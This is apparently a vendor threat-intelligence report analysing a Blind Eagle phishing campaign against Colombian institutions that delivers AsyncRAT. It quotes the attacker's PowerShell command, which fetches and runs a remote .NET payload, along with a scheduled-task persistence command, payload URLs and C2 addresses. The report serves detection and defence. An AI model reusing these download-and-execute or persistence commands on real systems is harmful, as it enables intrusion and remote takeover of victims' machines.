Blind Eagle Deploys Fake UUE Files and Fsociety to Target Colombia's Judiciary, Financial, Public, and Law Enforcement Entities

Summary

APT-C-36, also known as Blind Eagle, has been actively targeting organizations in Colombia and Ecuador since at least 2019. It relies on spear-phishing emails sent to specific and strategic companies to conduct its campaigns. On Feb. 20, the BlackBerry Research and Intelligence team witnessed a new campaign where the threat actor impersonated a Colombian government tax agency to target key industries in Colombia, including health, financial, law enforcement, immigration, and an agency in charge of peace negotiation in the country.

Based on the infector vector and payload deployment mechanism, we also uncovered campaigns targeting Ecuador, Chile, and Spain.

Brief MITRE ATT&CK Information

Weaponization and Technical Overview

Technical Analysis

Context

APT-C-36 is a South American cyber espionage group that has been actively targeting Latin America-based entities over the last few years. Although most of its efforts have been focused on Colombia, according to research conducted by CheckPoint researchers, it has also carried out intrusions against Ecuador.

The main targets of this group for the last few years have been those related to financial and governmental entities.

The initial vector for infection is typically a PDF attachment sent by email. In the case we’ll be examining in this report, the sender of the phishing email opted to use the Blind Carbon Copy (BCC) field instead of the To: field, most likely in an attempt to evade spam filters. They orchestrated their scam to correspondencia@ccb.org.co, which is the official email address listed on the Contact Us page of the Bogota Chamber of Commerce website. Bogotá, of course, is the Capital of Colombia.

The email's Subject line reads, "Obligaciones pendientes - DIAN N.2023-6980070- 39898001" - in English, this means “outstanding obligations,” a lure craftily designed to catch the attention of unsuspecting law-abiding recipients. DIAN is Colombia’s Directorate of National Taxes and Customs - the Dirección de Impuestos y Aduanas Nacionales.

The letter we analyzed states that the recipient is “45 days in arrears” with a tax payment, and tells the target to click a link to view their invoice, which comes in the form of a password-protected PDF. The letter was signed by a (likely fictious) “Roberto Mendoza Ortiz, Department Head.” The phishing email's sender is "alfredo agudelo moreno agudelomorenoalfredo79[at]gmail[.]com," an email address which also appears to have been be made up specifically for this campaign.

We also found another email address associated with this campaign – cobrofactura09291[at]gmail[.]com.

The PDF attached to the phishing email tries to trick the recipient with logos and messages related to the Directorate of National Taxes and Customs. APT-C-36 has regularly used DIAN in their spear-phishing lures over the years, presumably hoping that their targets’ wish to maintain in good standing with the tax authorities would override any natural caution they may have when opening emails sent from an unfamiliar email address.

The PDF contains a URL different from the legitimate hyperlink to DIAN’s website, which is https://www.dian.gov.co/. The URL shown is the real one; however, if the user clicks on it, they are redirected to a different website. Finally, the URL field of this new site contains a URL which downloads a second-stage payload from the public service Discord.

Below is the full intrusion attempt shown step-by-step:

Figure 1: Attack flow of Blind Eagle’s campaign analyzed

Attack Vector

What is the DIAN?

The Directorate of National Taxes and Customs is an entity attached to the Ministry of Finance and Public Credit. The DIAN is organized as a Special Administrative Unit of the national order. Its purpose is to help guarantee the fiscal security of the Colombian State and the protection of the national economic public order through the administration and control of due compliance with tax, customs, and exchange obligations. The jurisdiction of the DIAN includes the national territory. It is headquartered in Bogotá, the Capital of Colombia.

Weaponization

Blind Eagle carefully targets its victims with spear-phishing emails, in a similar fashion to other campaigns by the group. It entices its targets to click links contained in the body of the email, or to download a malicious PDF file, which purports to contain information about overdue taxes.

The URL shown on the bait document masquerades as the actual domain of DIAN. However, when clicked, the hyperlink leads to another domain created entirely by the threat actor using the public service website[.]org. The link redirects the target to dian.server[.]tl. This crafty technique is known as URL phishing.

Figure 2: Content of the bait email, masquerading as the Directorate of National Taxes and Customs

In English, the bait document reads:

When the victim clicks on the masked link in the email, they are redirected to dian.server[.]tl. The threat actor carefully crafted this webpage to deceive the victim into believing they are interacting with the real DIAN.

Figure 3: Content presented to the user on the fake webpage dian.server[.]tl

Looking at the code of the webpage, the content presented to the users is loaded from website[.]org/s8Xwt2 or website[.]org/render/s8Xwt2, and not from dian.server[.]tl. This is accomplished by using an iframe resized to the 100% of the screen.

Figure 4: The content the victim sees is shown on the left, which is loaded from the resource shown on the right

The fake DIAN website page contains a button that encourages the victim to download a PDF to view what the site claims to be pending tax invoices. Clicking the blue button initiates the download of a malicious file from the Discord content delivery network (CDN), which the attackers are abusing in this phishing scam.

• hxxps://cdn.discordapp[.]com/attachments/1067819339090243727/1071063499494666240/Asuntos_DIAN_N34000137L287004P08899997012-03-02-2023-pdf[.]uue
• hxxps://cdn.discordapp[.]com/attachments/1066009888083431506/1070342535702130759/Asuntos_DIAN_N6440005403992837L2088970004-01-02-2023-pdf[.]uue
• hxxps://cdn.discordapp[.]com/attachments/1072851594812600351/1072851643583967272/Asuntos_DIAN_N3663000227L2870000002456880-08-02-2023-pdf[.]uue

The downloaded file tries to trick the user into manually adding the word “pdf” at the end of the filename. However, the real extension is actually “uue.” This is a file extension WinRAR opens by default. Behind the extension there is a .RAR archive.

Figure 5: Default installation of WinRAR with uue extension  

It’s necessary to decompress the contents of the .uue file to continue with the infection chain. The compressed .uue file contains yet another file inside it. The inner file uses the same naming convention as the parent, but in this case, the new file is a Visual Basic Script (VBS).

Figure 6: Content of the malicious .uue file  

The file-extracted VBS script is executed via wscript.exe once the user double-clicks the file, so an element of user-interaction is involved in executing the attack. Upon execution, the infection chain starts automatically and carries out various actions within the system without any further user input, as seen below in figure 7.

Figure 7: Process tree once the VBS script is manually executed by the user

The VBS script's content is encoded but easy for a researcher to understand and decode.

Figure 8: Content of the VBS script

The VBS script contains a significant amount of junk code, but has several replace functions to construct the PowerShell execution.

Figure 9: Replace functions to replace junk code by the original behavior

The content was built under the variable “OXVTEUOWQPEFWQ”, as shown in figure 9 above. After creating that content, figure 8 shows the variable “YISMXXAPAUXCGFI”, which is set as a WScript object.

After decoding the code, to better understand its behavior, we can see that a part of the logic - the URL shown in the above image - is actually reversed.

Figure 11: A closer look at part of the VBS code, decoded

The final payload executed is powershell.exe, with the following command line parameters:

• "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('hxxp://172.174.176[.]153/dll/Dll.ppam'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('txt.ysa/3383903646370010701/3046420575525667501/stnemhcatta/moc.ppadrocsid.ndc//:sptth'))

First, PowerShell downloads and executes the decoded base64 content of hxxp://172.174.176[.]153/dll/Dll.ppam, which is a .NET DLL encoded, as shown in figure 12.

Figure 12: Base64 content from the server, called using powershell.exe

Next, it uses GetType(‘Fiber.home’).GetMethod(‘VAI’), to load the VAI method from the DLL downloaded previously. The logic of this method is as follows:

• To create a copy of the Visual Basic Script called “Asuntos_DIAN_N°6440005403992837L2088970004-01-02-2023-pdf.vbs” in C:\Windows\Temp\OneDrive.vbs if it already doesn’t exist using PowerShell.
  • Powershell.exe -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\Windows\Temp\OneDrive.vbs
• Download the content of hxxp://172.174.176[.]153/rump/Rump.xls (Fsociety)
• Replace characters of the content downloaded
• Reverse the text of the second URL in the PowerShell command and download its content (hxxps://cdn.discordapp[.]com/attachments/1057665255750246403/1070100736463093833/asy[.]txt (AsyncRAT payload)
• Create a string with the content “C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe”
• Load the Fsociety DLL into memory, passing two parameters:
  • RegSvcs path
  • AsyncRAT payload
• Fsociety DLL loads AsyncRAT in the RegSvcs process using the Process Hollowing technique

To better understand the PowerShell execution, the following image demonstrates the sequence of loading DLLs dynamically in memory until the final goal, which is to load AsyncRAT into memory. AsyncRAT is one of the most popular open-source remote access Trojans (RATs) on the threat landscape today.

Figure 13: Sequence of loaded DLLs after PowerShell execution

The following image is part of all the behavior described above, related to the first DLL loaded using the PowerShell command spawned by the VBS Script and calling the ‘VAI’ method.

Figure 14: Part of the method VAI previously called by PowerShell

As mentioned, Fsociety.dll is used to load the final payload of AsyncRAT, which is downloaded from Discord.

Blind Eagle mainly uses AsyncRAT, njRAT, QuasarRAT, LimeRAT, and RemcosRAT in its campaigns. A RAT is a remote access tool a network admin may use to remotely administrate the node. So a malicious RAT installed on a victim’s machine enables the threat actor to connect to the infected endpoint any time they like, and to perform any operations they desire.

Figure 15: Fsociety.dll is used to load AsyncRAT in memory

The “Ande” function called in the Fsociety.dll contains the following code:

Figure 16: Fsociety DLL code
 

AsyncRAT contains a configuration method with information that is used during the intrusion attempt. This information is encrypted using Base64 and AES256.

Figure 17: AsyncRAT configuration encrypted

Once the configuration is decrypted, it contains information about the Command-and-Control (C2) to transfer commands and files between client and server.

Figure 18: AsyncRAT configuration decrypted

Also, between the configuration, it was possible to obtain the X.509 certificates used for communication with the C2.

Figure 19: Certificate extracted from the AsyncRAT config

AsyncRAT can establish persistence in two different ways, depending on whether a user loaded it with admin privileges or not. A copy of itself is first created under C:\Users\<user>\AppData\Roaming\MRR.exe.

Figure 20: Creation of MRR in AppData folder

1.      If the user who executed it was an admin, then AsyncRAT can create a scheduled task using the process schtasks.exe, with the following command line:

a.      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "MRR" /tr '"C:\Users\<user>\AppData\Roaming\MRR.exe"' & exit'

Figure 22: Command line executed to create scheduled task and run AsyncRAT

2.      If the user is not an admin, then AsyncRAT can create a registry key to execute the binary every time the system is started:

a.      Key: KCU\Software\Microsoft\Windows\CurrentVersion\Run\MRR
b.      Value: C:\Users\<user>\AppData\Roaming\MRR.exe

Figure 23: Registry key created to execute the AsyncRAT Payload

An interesting part that always happens, regardless of whether the user is admin or not, is the creation of a .bat file in the user’s Temp directory to perform the following actions:

a.      Timeout.exe execution for three seconds
b.      Run the AsyncRAT payload from AppData folder
c.       Delete the .bat file

Figure 25: Execution of cmd.exe to load the .bat file from tmp folder

We could determine that the .bat filename is randomly generated using the regular expression after several executions of this sample. The structure is like the next one: .*tmp[a-zA-Z1-9]{4}.tmp.bat.

Figure 26: Persistence methods used by AsyncRAT

Network Infrastructure

In this case, the victim’s machine starts communicating with the DuckDNS server to receive and execute commands, exfiltrate information, and perform any other action desired by the threat actor. As seen in figure 18 above, the server used is asy1543.duckdns[.]org:1543.

Figure 27: Communication started between victim’s machine and the threat actor’s C2

During our investigation, the resolution of the DuckDNS domain was changed to different IP addresses. Initially, the IP that resolves the domain was a VPN/Proxy service 46.246.86[.]3. While conducting the investigation, we discovered another IP with the same purpose, 46.246.12[.]6.

Blind Eagle/ APT-C-36 uses Dynamic DNS (DDNS) services, such as DuckDNS, for most campaigns to connect its implemented RATs to the infrastructure they control to send and receive commands. DuckDNS additionally allows for high IP resolution rotation and the launch of new subdomains under this well-known DDNS

The application web hosted under hxxp://172.174.176[.]153/ had two main directories where it stored information to be used during the intrusion as the user downloads and executes files.

The first directory was hxxp://172.174.176[.]153/dll/, storing several DLLs used during the intrusion.

Figure 28: Index of APT-C-36's /dll directory

Another directory is found at hxxp://172.174.176[.]153/rump/ and stores another DLL, in this case, related to Fsociety:

Figure 29: index of /rump directory

Targets

Blind Eagle/ APT-C-36's targets include health, public, financial, judiciary, and law enforcement entities in Colombia.

Among the countries where we have seen Blind Eagle activity in the last few months, specifically distributing the UUE file types with different themes, include:

• Colombia
• Ecuador
• Chile
• Spain

This is consistent with the use of the Spanish language in the group’s spear-phishing emails. Most countries in South America use Spanish (apart from Brazil), which matches the threat actor’s locale and the names in the bait document.

Attribution

APT-C-36 is a South American-based threat actor active since at least 2019. The group continues to concentrate its operations within a Hispanic geographic region, with its main targets being government institutions and other organizations primarily based in Colombia.

The use of specific tools and artifacts, along with the type and configuration of the network infrastructure documented in this report, combined with the tactics, techniques & procedures (TTPs) used to deploy them, all closely align with previously attributed campaigns by this group.

That, coupled with the geolocation and nature of the targets seen in this campaign, leads us to ascertain, at the very least, a moderate level of confidence that this campaign was conducted by APT-C-36.

Conclusions

This campaign continues to operate for the purposes of information theft and espionage. The modus operandi used has mostly stayed the same as the group’s previous efforts – it is very simple, which may mean that this group is comfortable with its way of launching campaigns via phishing emails, and feels confident in using them because they continue to work.

Over the next few months, we will likely continue to see new targets for this group, using new ways to deceive their victims.

APPENDIX 1 - Applied Countermeasures

Yara Rules

Disclaimer: The private version of this report is available upon request. It includes but is not limited to the complete and contextual MITRE ATT&CK® mapping, MITRE D3FEND™ countermeasures, and other threat detection content for tooling, network traffic, complete IOCs list, and system behavior. Please email us at cti@blackberry.com for more information.